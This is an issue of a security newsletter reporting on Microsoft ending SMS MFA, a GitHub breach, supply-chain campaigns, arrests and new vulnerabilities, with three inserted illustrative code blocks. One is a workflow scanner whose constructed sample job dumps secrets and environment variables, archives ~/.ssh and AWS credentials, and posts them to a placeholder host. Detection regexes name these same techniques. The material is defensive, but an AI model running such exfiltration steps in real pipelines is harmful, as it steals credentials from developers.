Risky Bulletin: Microsoft ends SMS MFA for personal accounts

In other news: GitHub hacked via VS Code extension; CISA to let researchers submit new KEV entries; SMS blaster detained at Eurovision.


This newsletter is brought to you by Push Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business" in your podcatcher or subscribing via this RSS feed. You can also add the Risky Business newsletter as a Preferred Source to your Google search results by going here.

Microsoft is phasing out SMS as a multi-factor authentication and account recovery option for personal Microsoft accounts.

All users will be prompted to add a passkey the next time they log into their accounts.

The company said SMS was a leading source of fraud and the most targeted vector for account takeover.

Going passkey-only also speeds up sign-in, since users no longer have to wait for an SMS to arrive, and makes account recovery smoother and more secure, since the account is no longer tied to a phone number.

Passkeys are also phishing-resistant, which makes them superior to SMS MFA, which can be phished with adversary-in-the-middle (AitM) phishing kits, sometimes called reverse-proxy phishing kits.

While these were a rarity a decade ago, AitM phishing kits have become commonplace since 2019, when tools like Modlishka, Muraena, and Evilginx served as a template and showed cybercrime groups how to intercept SMS MFA codes in real time.

Microsoft becomes the first major platform to abandon SMS MFA. Other platforms like Google, Facebook, and Twitter are pushing users by default to stronger MFA alternatives, but still allow them to use SMS as a last resort.
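The reason a reverse-proxy kit can relay an SMS code but not a passkey is origin binding: the browser, not the phishing page, writes the page's real origin into the WebAuthn client data, and the relying party rejects any assertion whose origin or RP ID is not its own. The following added example (not Microsoft's code or any kit's code) simulates both flows; the RP ID, origins, code and challenge are made up, and the signature check over the assertion is a separate step assumed to follow the binding checks shown here.

```python
"""Origin binding: why an AitM proxy can relay an SMS code but not a passkey.

Added example, not code from Microsoft or from any phishing kit. RP_ID,
the origins, the OTP and the challenge are constructed; signature
verification over authenticatorData || SHA-256(clientDataJSON) is assumed
to follow the checks implemented here.
"""
import base64
import hashlib
import json
import secrets

RP_ID = "login.example"                    # assumed relying party ID
EXPECTED_ORIGIN = "https://login.example"  # assumed legitimate origin


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def verify_otp(expected: str, submitted: str) -> bool:
    """An SMS/TOTP code carries nothing about the page it was typed into, so
    a proxy that forwards it inside the validity window looks like the user."""
    return secrets.compare_digest(expected, submitted)


def browser_sign(page_origin: str, requested_rp_id: str, challenge: bytes) -> dict:
    """Simulates browser + authenticator on navigator.credentials.get().

    The browser fills in the origin the page was actually served from, and
    only accepts an rpId equal to the page host or a registrable suffix of it.
    """
    host = page_origin.split("://", 1)[1].split("/", 1)[0]
    if not (host == requested_rp_id or host.endswith("." + requested_rp_id)):
        raise PermissionError(f"SecurityError: rpId {requested_rp_id!r} invalid for {host!r}")
    client_data = json.dumps({
        "type": "webauthn.get",
        "challenge": b64url(challenge),
        "origin": page_origin,
    }).encode()
    # authenticatorData = rpIdHash(32) || flags(1) || signCount(4)
    flags = 0x01 | 0x04  # user present, user verified
    auth_data = (hashlib.sha256(requested_rp_id.encode()).digest()
                 + bytes([flags]) + (1).to_bytes(4, "big"))
    return {"clientDataJSON": client_data, "authenticatorData": auth_data}


def verify_assertion(assertion: dict, expected_challenge: bytes) -> tuple:
    """Relying-party checks that precede signature verification; these are
    what defeat an assertion relayed from another origin."""
    client_data = json.loads(assertion["clientDataJSON"])
    auth_data = assertion["authenticatorData"]
    if client_data.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    if not secrets.compare_digest(b64url_decode(client_data.get("challenge", "")), expected_challenge):
        return False, "challenge mismatch (stale or replayed)"
    if client_data.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin {client_data.get('origin')!r} is not {EXPECTED_ORIGIN!r}"
    if not secrets.compare_digest(auth_data[:32], hashlib.sha256(RP_ID.encode()).digest()):
        return False, "rpIdHash does not match our RP ID"
    if not auth_data[32] & 0x01:
        return False, "user presence flag not set"
    return True, "client data bound to our origin; proceed to signature check"


def simulate_aitm_relay() -> dict:
    """Victim on the proxy's lookalike origin; the proxy forwards the real
    server's challenge and the victim's responses to the real server."""
    proxy_origin = "https://login-example.com"  # constructed lookalike
    results = {}

    # SMS code typed into the proxy page and forwarded verbatim: accepted.
    results["otp_relay_accepted"] = verify_otp("482913", "482913")

    challenge = secrets.token_bytes(32)  # issued by the real server, relayed by the proxy

    # Legitimate user on the real origin.
    ok, _ = verify_assertion(browser_sign(EXPECTED_ORIGIN, RP_ID, challenge), challenge)
    results["passkey_legit_accepted"] = ok

    # Proxy page requests the real RP ID: the browser refuses outright.
    try:
        browser_sign(proxy_origin, RP_ID, challenge)
        results["browser_blocks_foreign_rp_id"] = False
    except PermissionError:
        results["browser_blocks_foreign_rp_id"] = True

    # Proxy page uses its own RP ID and relays the assertion: server rejects.
    relayed = browser_sign(proxy_origin, "login-example.com", challenge)
    ok, reason = verify_assertion(relayed, challenge)
    results["passkey_relay_accepted"] = ok
    results["relay_reject_reason"] = reason
    return results


if __name__ == "__main__":
    for key, value in simulate_aitm_relay().items():
        print(f"{key}: {value}")
```

The order of checks matters less than their presence: even if a kit registered its own RP ID, the origin in clientDataJSON and the rpIdHash in authenticatorData both name the lookalike host, and the server's per-login challenge stops the captured assertion from being replayed later.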

Risky Business Podcasts

The main Risky Business podcast is now on YouTube with video versions of our recent episodes. Below is our latest weekly show with Pat, Adam, and James at the helm!


Breaches, hacks, and security incidents

GitHub hacked via VS Code extension: Hackers have stolen GitHub's internal repositories after an employee installed a malicious VS Code extension. More than 3,800 internal code repositories have been exfiltrated and are now being offered for sale on a hacking forum. GitHub says it is rotating critical secrets and tokens to prevent any further access to its assets. The malicious VS Code extension was identified as Nx Console, which was itself compromised in the TanStack supply chain attack last week. [GitHub // Nx Console incident // Leak analysis]

Grafana links recent hack to TanStack incident: Grafana also named the same TanStack incident as the source of its own hack, which took place just days before GitHub's. [Grafana]

Wahlap's leaky server: Chinese game arcade maker Wahlap exposed the personal details of almost 19 million customers. The data leaked via an Elasticsearch database that was left unprotected on the internet. The data was tied to customers' WeChat accounts and included phone numbers and full names. The database remained exposed for at least two months until the server was secured. [Cybernews]

Northern Mariana incident: A cyberattack has disrupted the email servers of the government of the Northern Mariana Islands. Officials from the US territory did not specify if this was a ransomware attack. The incident is expected to slow down administrative tasks. [DysruptionHub]

Russia hacks Bluesky accounts for disinfo ops: Russian operators have hijacked Bluesky accounts to post pro-Kremlin and anti-Ukraine propaganda. The hacks have been going on since April. Bluesky has been suspending the affected accounts until their owners could step in and resecure them. The propaganda posted on the hacked accounts is the work of a Russian disinformation group known as Matryoshka. [NYT // Clemson University]

Patel's store gets hacked: Kash Patel's "Based Apparel" online store has been hacked and is hosting ClickFix pages. [International Cyber Digest]

Trump Mobile leaked user data: Trump Mobile has fixed a bug on its official website that exposed the data of users who signed up for the company's gold-colored smartphone. The website allegedly exposed email addresses, physical addresses, and full names. The company was allegedly notified of the bug in advance but did not fix the issue, patching it only after several YouTubers covered the leak. Trump Mobile has been accused of scamming its customers, since it has yet to ship any of the Trump-themed phones customers ordered. [PCMag]

General tech and privacy

Tails removes Thunderbird: The Tor Project has removed the Thunderbird email client from the Tails privacy OS. Because the two projects' release calendars do not line up, the Thunderbird version that shipped with Tails was almost always outdated and contained known vulnerabilities. [The Tor Project]

Dutch regulator asks EU for help against bad ads: The Dutch consumer protection agency has asked national and EU regulators to take action against Google, Meta, and TikTok. The agency says the companies are not removing malicious ads from their platforms and are not replying to reports. Meta and TikTok were the worst offenders, leaving between 70 and 80% of the reported malicious ads in place. Polish authorities accused Meta of the same behavior last year. Reuters won a Pulitzer prize this year for reporting on Meta's quiet acceptance of fraud on its platform. [Consumentenbond]

Apple blocked 1.1b new fraudulent accounts: Apple has blocked threat actors from creating 1.1 billion new accounts that were intended to be used for online fraud. Apple also deactivated more than 40 million user accounts that had engaged in fraud last year. In total, the company says it blocked more than 5.4 million stolen cards from being used on its platform and prevented $2 billion in fraudulent transactions. [Apple]

Government, politics, and policy

Russia's growing software security issues: Around a third of Russian companies are using Western software acquired before 2022, before Russia's invasion of Ukraine. Most of that software no longer receives technical support or security updates. The highest concentration of Western software is in corporate email. Microsoft still holds 50% of the Russian market through its Exchange and Microsoft 365 products. [Kommersant]

Armenia faces waves of disinformation: Ahead of its June 7 parliamentary elections, Armenia's pro-EU forces are facing a generational wave of Russian disinformation, on the same level of absurdity as Moldova faced last year and Hungary this year, with Russian trolls spreading rumors that the pro-EU government and ministries are corrupt, have AIDS, and are all on drugs. Literally copy-pasted stuff from other countries. Groups like Matryoshka (SDA) and Storm-1516 are behind the campaigns. [The Insider // Euronews]

Dems want answers on CISA leak: US Senator Maggie Hassan, a member of the Senate Homeland Security Committee, has requested a classified briefing with CISA on the agency's recent leak, where a contractor leaked sensitive cloud keys for CISA's server infrastructure. [Sen. Maggie Hassan]

White House postpones AI security EO: After countless rumors that the White House was publishing an executive order on Friday on AI security, officials have postponed it hours before it was set to be signed. [CyberScoop]

CISA to let researchers submit vulns to KEV: US cybersecurity agency CISA will let security researchers and other third parties submit reports of actively exploited vulnerabilities. If confirmed, the submissions will be added to the CISA KEV database. The agency has launched a new web form where researchers can file reports. CISA's KEV database has fallen behind in recent months and has been repeatedly criticized for not containing information on all actively exploited bugs. [CISA]

In this Risky Business sponsor interview, James Wilson chats with Push Security's Chief Research Officer Jacques Louw about how the company has integrated an army of AI agents into its threat detection platform. Not only has agentic AI led to the discovery of Install Fix campaigns, but it will help simplify the platform for new customers.

Arrests, cybercrime, and threat intel

Ukraine detains infostealer operator: Ukraine's Cyber Police has arrested an 18-year-old who used an infostealer to hijack online accounts and make unauthorized transactions. The teen allegedly hacked more than 28,000 accounts and made more than 5,800 transactions totalling more than $721,000. He was also selling some of the hacked accounts and associated session tokens. [Ukraine's Cyber Police]

Execs plead guilty for tech support scams: Two American nationals have pleaded guilty to providing server infrastructure services through their company to telemarketing and tech-support fraud schemes. [DOJ]

SMS blaster detained at Eurovision: Austrian tactical forces have arrested a 32-year-old Chinese national on cybercrime charges. The suspect was arrested with an SMS blaster in his car outside the Eurovision song contest in Vienna last weekend. The man was also charged with endangering his 6-year-old son who was also in the car with him. [Austrian Police // CommsRisk]

Kimwolf admin arrested in Canada: A Canadian national was arrested by authorities for running the Kimwolf DDoS botnet. Jacob Butler was detained in Ottawa by Canadian police this week. He is charged with building and renting out the botnet, which was used in more than 25,000 attacks last year. US and European authorities took down the botnet in a joint operation in March. [DOJ]

First VPN takedown: Authorities in France and the Netherlands have seized the servers of a VPN service used by cybercrime gangs. The First VPN service had operated for years and was mainly advertised on Russian-speaking hacking forums. Over the years, it was used in large-scale fraud, data theft, and ransomware attacks. Authorities arrested the service's admin in Ukraine, took down 33 servers, and seized four domains. [Europol // FBI industry alert, PDF]

Coruna found on npm: A version of the Coruna iOS exploit kit has been found on the npm portal. The exploit kit was the final payload hidden in Art-Template, a popular JavaScript template engine. The infected template engine deployed Coruna to search for iOS users, hack their devices, and steal crypto-wallet data. The Coruna exploit kit was initially used for covert espionage campaigns but was also linked to Chinese e-crime operations after its code got stolen and sold. [SafeDep // Socket Security]

Kali365 PSA: The FBI has published a public service announcement on the rise of Kali365, a phishing platform capable of AitM attacks that bypass MFA, as well as device code phishing. [FBI]

Chinese data broker ecosystem: Security researchers look at the top 5 largest data trading platforms in the Chinese underground—Exchange Market (交易市场, Deepmix), Chang’An Sleepless Night (长安不夜城), Aiqianjin (爱钱进), Yiqun Data (义群数据), and the Phoenix Overseas Resources (凤凰海外资源). [Group-IB]

The STC problem: The Saudi Telecom Company has been found to host almost three-quarters of all malware command-and-control servers targeting the MENA region. [Hunt Intelligence]

Ghost CMS campaign: A hacking campaign is planting FakeCaptcha pages and malware on websites built with the Ghost CMS. The attacks began this month and are exploiting a vulnerability disclosed in February. At least two threat actors are conducting campaigns in parallel. More than 700 websites have been hacked so far. [QiAnXin // CVE-2026-26980]

Prompt injections in the wild: Palo Alto Networks' Unit 42 joins Google and Forcepoint in reporting AI prompt injection attacks observed in the wild. [Palo Alto Networks]

Megalodon campaign hits GitHub: An automated campaign has tried to backdoor more than 5,500 GitHub repositories. The attackers used malicious commits that deployed a GitHub Action on the targeted repositories. The Action ran a bash script that stole CI secrets, cloud credentials, SSH keys, and other tokens. [SafeDep]
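A pushed workflow file is the whole attack surface in a campaign like this, so the review that matters is of `.github/workflows/*.yml` changes. The following added example (not SafeDep's tooling and not the campaign's code) is a line-oriented heuristic scanner for the combination the entry describes: dumping the secrets context or the runner environment, reading credential files, and shipping the result off-host. The indicator list and both sample workflows are constructed for illustration, and the two-indicator threshold is a choice made here, not a published rule.

```python
"""Heuristic scan of GitHub Actions workflows for secret-exfiltration steps.

Added example; not SafeDep's code or the Megalodon payload. Indicators and
sample workflows are constructed. Intended for use in a pre-merge check or
on a diff of .github/workflows/, not as a replacement for reading the file.
"""
import re
from dataclasses import dataclass, field

# (indicator name, regex). One legitimate workflow often hits one of these;
# several distinct classes in one file is the signal.
INDICATORS = [
    ("all-secrets-context", re.compile(r"toJSON\(\s*secrets\s*\)|\$\{\{\s*secrets\s*\}\}")),
    ("env-dump", re.compile(r"\b(env|printenv|set)\b\s*(\||>|;|$)")),
    ("remote-code-exec", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b")),
    ("encoded-payload", re.compile(r"base64\s+(-d|--decode)|\bxxd\s+-r")),
    ("outbound-post", re.compile(r"\bcurl\b[^\n]*(-d|--data|-F|-T|--upload-file)|\bnc\b\s+\S+\s+\d+")),
    ("credential-paths", re.compile(r"~/\.ssh|\.aws/credentials|\.docker/config\.json|\.npmrc|\.git-credentials|\.kube/config")),
    ("dns-exfil", re.compile(r"\b(dig|nslookup|host)\b[^\n]*\$\(")),
]


@dataclass
class Finding:
    line_no: int
    indicator: str
    text: str


@dataclass
class ScanResult:
    findings: list = field(default_factory=list)

    def score(self) -> int:
        """Number of distinct indicator classes hit (not raw line hits)."""
        return len({f.indicator for f in self.findings})

    def verdict(self) -> str:
        # Threshold chosen here: two independent classes in one workflow.
        return "suspicious" if self.score() >= 2 else "ok"


def scan_workflow(text: str) -> ScanResult:
    result = ScanResult()
    for line_no, line in enumerate(text.splitlines(), 1):
        code = re.split(r"\s#", line, maxsplit=1)[0]  # drop trailing YAML comments
        for name, pattern in INDICATORS:
            if pattern.search(code):
                result.findings.append(Finding(line_no, name, line.strip()))
    return result


# Constructed sample: the shape described in the entry above.
MALICIOUS_WORKFLOW = """\
name: CI
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Setup
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          env | base64 -w0 > /tmp/.e
          tar czf /tmp/.k ~/.ssh ~/.aws/credentials 2>/dev/null
          curl -s -X POST --data-binary @/tmp/.e https://collector.invalid/upload
"""

# Constructed sample: an ordinary workflow that uploads a coverage report.
BENIGN_WORKFLOW = """\
name: tests
on: push
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: npm ci
      - run: npm test
      - name: Upload coverage
        run: curl -s -F file=@coverage.xml https://codecov.example/upload
        env:
          TOKEN: ${{ secrets.CODECOV_TOKEN }}
"""

if __name__ == "__main__":
    for label, text in (("malicious", MALICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        result = scan_workflow(text)
        print(f"{label}: {result.verdict()} ({result.score()} indicator classes)")
        for f in result.findings:
            print(f"  L{f.line_no} [{f.indicator}] {f.text}")
```

The benign workflow trips only the outbound-post indicator, which is why the verdict keys off distinct classes rather than raw hits; `${{ toJSON(secrets) }}` alone is worth a manual look in any repository, since it hands every secret to a single step.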

Gemini and Claude SERP poisoning: Google Search is drowning in malicious search results that lead users to malware if they search for Gemini and Claude AI-related terms. This comes days after Google announced it was abandoning its classic search for an AI experience. [EclecticIQ]

TamperedChef campaigns: Palo Alto looks at several threat actor clusters that have been spreading the TamperedChef infostealer disguised as various types of free Windows apps. [Palo Alto Networks]

Android carrier billing fraud: A cluster of more than 250 Android apps is engaging in billing fraud by subscribing users to premium SMS services. The apps have made victims in Malaysia, Thailand, Romania, and Croatia. The apps abuse popular brands and are hosted on third-party sites. [Zimperium]

Spammers abuse Microsoft internal email: A threat actor has found a way to abuse an internal Microsoft email address to send out massive waves of spam carrying all sorts of scams and lures. The address abused in the campaign (msonlineservicesteam@microsoftonline[.]com) is normally used for official Microsoft notifications, so the messages pass the checks users and filters rely on, which makes this campaign particularly dangerous and effective. [Spamhaus // TechCrunch]


Malware technical reports

CypherLoc screen locker: Here's something you haven't seen in a while: a browser-based screen locker distributed via email spam. [Barracuda]

In this wholly sponsored Soap Box edition of the show, Patrick Gray chats with Adam Bateman and Luke Jennings from Push Security.

APTs, cyber-espionage, and info-ops

Operation Dragon Whistle: A threat actor tracked as UNG0002 is behind an extremely targeted spear-phishing campaign targeting students and faculty at Changzhou University in China. [Seqrite]

"What makes this campaign particularly effective is the precision of its social engineering. The threat actor did not use a generic lure — they specifically identified that Changzhou University conducts mandatory annual fitness assessments where failure directly impacts graduation eligibility. This creates an environment of urgency and compliance that significantly increases the probability of victim engagement."

Webworm APT: A Chinese APT group known as Webworm shifted its operations from Asia to Europe last year. For some operations, the group used Discord as a C2 channel, which allowed researchers to retrieve data on some past attacks. [ESET]

The DPRK on npm, again: A DPRK infostealer and RAT were found in four npm packages this week. [Ox Security]

UAC-0244 targets drone operators: Researchers have spotted a malware campaign "clearly" targeting Ukrainian FPV drone operators. [Synaptic Systems]

UAC-0057 (UNC1151) targets Prometheus platform: A cyber-espionage group is targeting professionals in Ukraine who are seeking to obtain certificates through the Linux Foundation Prometheus platform. [CERT-UA]

ZionSiphon: DomainTools has a pretty deep dive into ZionSiphon, the Iranian data wiper that was coded with AI and attempted to wipe IT systems at Israeli water utilities. [DomainTools]

Vulnerabilities, security research, and bug bounty

Security updates: BIND9, Cisco, Dify, Drupal, HP, Mastodon, PowerDNS, Symfony, Tails, Twig, ZKTeco.

Google API keys live for a short while after deletion: Google API keys continue working for about 23 minutes on average after being deleted, most likely because the revocation takes time to propagate through caches. This is an important detail for anyone doing IR: a key is not dead when the console says it is, and calls made in that window still count. [Aikido Security]
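The practical consequence for a responder is to verify rejection rather than assume it, and to record when rejection was first observed so the incident timeline ends at the right moment. The following added example (not Aikido's tooling) polls an injected probe until the key is refused or a timeout expires; the probe, clock and sleep are injected so the same logic runs offline here against a constructed key service, and in production a real probe would make a cheap authenticated request and return its HTTP status.

```python
"""Confirm that a deleted API key is actually rejected, and when.

Added example, not Aikido's code. `probe` stands in for a cheap
authenticated request (return the HTTP status); `clock`/`sleep` are
injectable so the simulation below runs offline.
"""
import time
from dataclasses import dataclass
from typing import Callable, Optional

# Google's API gateway answers 400 "API key not valid" for an unknown key;
# most other services answer 401 or 403. Override per service as needed.
DEFAULT_REJECTED_STATUSES = (400, 401, 403)


@dataclass
class RevocationCheck:
    rejected: bool                       # did we ever observe rejection?
    attempts: int                        # probes issued
    first_rejection_after_s: Optional[float]  # seconds from start to first reject
    last_status: int                     # last HTTP status seen


def wait_for_rejection(probe: Callable[[], int], *, timeout_s: float = 1800.0,
                       interval_s: float = 15.0,
                       rejected_statuses=DEFAULT_REJECTED_STATUSES,
                       clock: Callable[[], float] = time.monotonic,
                       sleep: Callable[[float], None] = time.sleep) -> RevocationCheck:
    """Poll until `probe` returns a rejection status or `timeout_s` passes.

    Every successful (non-rejected) probe after deletion is evidence that the
    key was still usable at that time; log activity up to
    `first_rejection_after_s` as in scope for the incident, not just up to
    the moment the key was deleted.
    """
    start = clock()
    attempts = 1
    status = probe()
    while status not in rejected_statuses:
        if clock() - start >= timeout_s:
            return RevocationCheck(False, attempts, None, status)
        sleep(interval_s)
        status = probe()
        attempts += 1
    return RevocationCheck(True, attempts, clock() - start, status)


def simulate(propagation_delay_s: float, *, interval_s: float = 15.0,
             timeout_s: float = 1800.0) -> RevocationCheck:
    """Offline run against a constructed key service that keeps honouring the
    key for `propagation_delay_s` after deletion (1380 s is the ~23 minute
    average from the report above)."""
    now = [0.0]

    def clock() -> float:
        return now[0]

    def sleep(seconds: float) -> None:
        now[0] += seconds

    def probe() -> int:
        return 200 if now[0] < propagation_delay_s else 400

    return wait_for_rejection(probe, timeout_s=timeout_s, interval_s=interval_s,
                              clock=clock, sleep=sleep)


if __name__ == "__main__":
    print(simulate(1380.0))   # rejected after 1380 s, 93 probes
    print(simulate(5000.0))   # not rejected within the 30 minute timeout
```

A probe should be the cheapest read-only call the key authorises, issued from a host that is not itself under investigation, so that the verification traffic is easy to tell apart from the attacker's in the provider's audit logs.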

Security audit of n8n templates: A security audit of 12,700+ n8n templates has found 716 workflows with at least one pre-authentication vulnerability an attacker can reach via the public internet. [AIronClaw]

Apple unrestricted filesystem access: Apple patched a bug last month in the Archive Utility that allowed nearly unrestricted access to the macOS filesystem. Tracked as CVE-2026-28910. [Thomas Mysk]

Google exposes major Chromium bug: Google has accidentally revealed details about an unfixed vulnerability in Chromium-based browsers. The bug allows threat actors to execute remote code and maintain persistent connections to affected browsers. The issue was first reported in 2022 and is still unfixed after four years. The bug report was set back to private after a few hours of being exposed online. [ArsTechnica // Lyra Rebane thread]


YellowKey mitigations: Microsoft has assigned a CVE to the YellowKey BitLocker bypass vulnerability disclosed last week and has shared mitigation advice until a patch is ready. [CVE-2026-45585]

PinTheft vulnerability: There's another Linux LPE in the wild, this one named PinTheft. The vulnerability impacts only distros where the RDS kernel module is enabled, such as Arch Linux. [V12 Security]

Another Linux LPE: The Linux kernel project has published patches for a vulnerability that enables local privilege escalation. The bug combines an authorization bypass and a race condition in the kernel's ptrace handling to let a malicious local process run commands as root. Security firm Qualys, which found the bug, has released four separate proof-of-concepts showing how it can be used against various local Linux services, such as SSH and the accounts daemon. [Qualys // CVE-2026-46333]

NGINX-PoolSlip: A week after the NGINX Rift vulnerability was disclosed, there's now another RCE in the NGINX server, this one named NGINX-PoolSlip. Details about this one will be published 30 days after a patch is released, to delay exploitation, which is already happening against NGINX Rift. [Nebula Security]

Windows Defender zero-days: Microsoft has released an out-of-band security update to fix two Windows Defender zero-days. The two bugs have been exploited in the wild to crash the Defender service and elevate an attacker's privileges. The two bugs were added to CISA's KEV database on Wednesday, along with five other Adobe and Microsoft vulnerabilities. [CVE-2026-45498 and CVE-2026-41091]

Four-Faith exploitation: Several botnets have adopted a 2024 vulnerability in Four-Faith industrial routers in their arsenals. [CrowdSec]

Cisco patches major CSW bug: Cisco has patched a major vulnerability in its Secure Workload platform. The vulnerability allows a remote unauthenticated attacker to send malformed API requests and run malicious code as Site Admin on the platform. Cisco Secure Workload, previously known as Tetration, is used to micro-segment networks spread across multiple cloud platforms. The vulnerability has a severity rating of 10/10. [CVE-2026-20223]

Drupal fixes highly-critical SQLi: Drupal has released a security update to patch a "highly critical" SQL injection affecting all current versions of the CMS. The vulnerability only impacts Drupal sites running on PostgreSQL databases and can be exploited by remote unauthenticated users. The Drupal team estimates that only 5% of all sites are impacted, but exploitation is trivial. [CVE-2026-9082]

Infosec industry

Threat/trend reports: CERT-FR, CloudBees [PDF], Dutch CBS, ISC2, the National Security and Defense Council of Ukraine, Rapid7, Synack, and WatchGuard have recently published reports and summaries covering various threats and infosec industry trends.

New tool—RAMPART: Microsoft has open-sourced RAMPART, an agent test framework for encoding adversarial and benign scenarios as repeatable tests that can run in a CI/CD pipeline.

New tool—Clarity: Microsoft has open-sourced Clarity, an AI agent for software engineers that asks them questions about the apps and code they're building.

New tool—OpenHack: Security firm Hadrian has open-sourced OpenHack, a tool for AI-powered source code review.

New tool—VeilGate: Security researcher Jai Kandepu has released VeilGate, an open-source deception proxy to raise the cost of automated security probing.

BSides Prishtina 2025 videos: Talks from the BSides Prishtina 2025 security conference, which took place in April last year, are available on YouTube.

Risky Business podcasts

In this edition of Seriously Risky Business, Tom Uren and James Wilson talk about moves from several European governments to ditch Signal and set up their own encrypted messaging systems for internal government use.

In this episode of Risky Business Features, Ollie Whitehouse, the CTO of the UK’s National Cyber Security Centre, joins Patrick Gray and James Wilson to talk about why “patch faster” will only get organisations so far in the face of the AI "bugpocalypse."